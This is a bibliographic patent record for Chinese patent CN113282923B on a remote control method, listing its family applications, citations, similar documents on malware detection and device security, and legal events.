CN113282923A CN113282923A (zh) | 2021-08-20 |
CN113282923B true CN113282923B (zh) | 2021-11-09 |
Family
ID=77287143
Family Applications (2)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202111193279.6A Pending CN113901454A (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
CN202110828548.5A Active CN113282923B (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
Family Applications Before (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202111193279.6A Pending CN113901454A (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
Country Status (1)
Country | Link |
---|---|
CN (2) | CN113901454A (zh) |
Families Citing this family (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN115577331B (zh) * | 2022-12-08 | 2023-03-17 | 成都不烦智能科技有限责任公司 | 交互控制方法、装置、系统及存储介质 |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
EP2173120A2 (en) * | 2008-10-02 | 2010-04-07 | Samsung Electronics Co., Ltd. | Method for remotely controlling portable terminal and system therefor |
CN104185180A (zh) * | 2014-08-18 | 2014-12-03 | 南京物联传感技术有限公司 | 一种网关设备与节点设备组网的方法 |
CN104217164A (zh) * | 2014-09-11 | 2014-12-17 | 工业和信息化部电子第五研究所 | 智能移动终端恶意软件的检测方法与装置 |
CN105357214A (zh) * | 2015-11-26 | 2016-02-24 | 东莞酷派软件技术有限公司 | 远程控制方法、远程控制装置、终端和远程控制系统 |
CN108965433A (zh) * | 2018-07-19 | 2018-12-07 | 天津市青创空间科技企业孵化器有限公司 | 一种智能物联网及其控制方法 |
CN111935307A (zh) * | 2020-09-16 | 2020-11-13 | 湖南新云网科技有限公司 | 硬件设备远程控制方法及装置、存储介质、透明计算系统 |
Family Cites Families (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US7730040B2 (en) * | 2005-07-27 | 2010-06-01 | Microsoft Corporation | Feedback-driven malware detector |
PT2987333T (pt) * | 2013-04-16 | 2019-07-26 | Home Control Singapore Pte Ltd | Controlo remoto para o primeiro e segundo aparelhos |
CN105721433B (zh) * | 2016-01-18 | 2018-11-09 | 河南科技大学 | 一种在线社交网络用户私有数据的访问控制方法 |
CN106452485B (zh) * | 2016-07-13 | 2018-07-17 | 杭州致峰网络科技有限公司 | 智能穿戴设备的控制系统 |
CN106230674B (zh) * | 2016-08-30 | 2020-10-30 | 青岛海尔股份有限公司 | 防止智能家电被恶意控制的方法与装置 |
CN109587230B (zh) * | 2018-11-23 | 2022-04-26 | 江苏艾默软件技术有限公司 | 一种物联网远程控制终端及控制方法 |
CN110225064A (zh) * | 2019-07-02 | 2019-09-10 | 恒安嘉新(北京)科技股份公司 | 监测僵尸网络攻击行为的方法、装置、设备和存储介质 |
-
2021
- 2021-07-22 CN CN202111193279.6A patent/CN113901454A/zh active Pending
- 2021-07-22 CN CN202110828548.5A patent/CN113282923B/zh active Active
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
EP2173120A2 (en) * | 2008-10-02 | 2010-04-07 | Samsung Electronics Co., Ltd. | Method for remotely controlling portable terminal and system therefor |
CN104185180A (zh) * | 2014-08-18 | 2014-12-03 | 南京物联传感技术有限公司 | 一种网关设备与节点设备组网的方法 |
CN104217164A (zh) * | 2014-09-11 | 2014-12-17 | 工业和信息化部电子第五研究所 | 智能移动终端恶意软件的检测方法与装置 |
CN105357214A (zh) * | 2015-11-26 | 2016-02-24 | 东莞酷派软件技术有限公司 | 远程控制方法、远程控制装置、终端和远程控制系统 |
CN108965433A (zh) * | 2018-07-19 | 2018-12-07 | 天津市青创空间科技企业孵化器有限公司 | 一种智能物联网及其控制方法 |
CN111935307A (zh) * | 2020-09-16 | 2020-11-13 | 湖南新云网科技有限公司 | 硬件设备远程控制方法及装置、存储介质、透明计算系统 |
Also Published As
Publication number | Publication date |
---|---|
CN113901454A (zh) | 2022-01-07 |
CN113282923A (zh) | 2021-08-20 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US20200311271A1 (en) | Method of malware detection and system thereof | |
CN102651061B (zh) | 用于检测复杂恶意软件的系统和方法 | |
US9065849B1 (en) | Systems and methods for determining trustworthiness of software programs | |
JP5265061B1 (ja) | 悪意のあるファイル検査装置及び方法 | |
EP3416083B1 (en) | System and method of detecting anomalous events | |
US8904538B1 (en) | Systems and methods for user-directed malware remediation | |
GB2485622A (en) | Server detecting malware in user device. | |
US20110209218A1 (en) | Environmental imaging | |
EP3127036B1 (en) | Systems and methods for identifying a source of a suspect event | |
CN109997138A (zh) | 用于检测计算设备上的恶意进程的系统和方法 | |
US10275596B1 (en) | Activating malicious actions within electronic documents | |
CN107665305B (zh) | 阻挡对受保护的应用程序的访问的系统和方法 | |
CN113282923B (zh) | 一种远程控制方法、计算设备及存储介质 | |
Choi et al. | All‐in‐One Framework for Detection, Unpacking, and Verification for Malware Analysis | |
KR100985076B1 (ko) | Usb 디바이스 보안 장치 및 방법 | |
KR101311367B1 (ko) | 메모리 보호기능 우회 공격 진단 장치 및 방법 | |
CN110659478B (zh) | 在隔离的环境中检测阻止分析的恶意文件的方法 | |
US10880316B2 (en) | Method and system for determining initial execution of an attack | |
CN111859386A (zh) | 基于行为分析的木马检测方法及系统 | |
US20230315850A1 (en) | Rootkit detection based on system dump sequence analysis | |
Thevenon et al. | iMRC: Integrated Monitoring & Recovery Component, a Solution to Guarantee the Security of Embedded Systems. | |
EP3276522B1 (en) | System and method of blocking access to protected applications | |
CN113849246B (zh) | 插件识别方法、插件加载方法、计算设备及存储介质 | |
Chen et al. | Vulnerability-based backdoors: Threats from two-step trojans | |
CN116738427B (zh) | 终端安全防护方法、装置、设备及存储介质 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |